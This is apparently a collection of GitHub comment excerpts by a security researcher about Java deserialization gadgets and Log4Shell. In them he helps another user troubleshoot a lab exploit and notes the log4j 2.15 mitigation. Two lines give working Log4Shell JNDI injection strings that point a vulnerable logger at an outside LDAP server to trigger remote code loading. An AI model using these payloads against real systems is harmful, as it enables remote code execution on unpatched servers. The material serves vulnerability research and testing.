Moritz Bechler

It looks to me that we are facing three kinds of incompatibilities: 1. pure serialization - i.e. across different library versions (many of the gadgets don't have a serialization api/version)...

@Marcono1234 I also implemented a custom serializer a while ago https://github.com/mb-syss/ruby-serialize, unfortunately in ruby (as the original intention was to contribute this to metasploit, which did not work out) that...

Sure, go ahead. Thanks.

-> https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

When targeting 8u181 this should work out of the box in my opinion. Regular Oracle/OpenJDK runtime? Security manager? How do you start the server?

Try ${jndi:ldap://192.168.178.253:1389/cn=Log4jRCE}

Hm, that sound like unbound is still unhappy about the DN, maybe ${jndi:ldap://192.168.178.253:1389/cn=Log4jRCE,dc=example,dc=com}

@allenz92 thanks for the pointer, I did never try to figure out why that was not working in that case. For every one else still having issues after considering all...

log4j 2.15 btw also moved to a getAttribute call instead of lookup, this also prevents following the Reference.

Yes, the call looks good.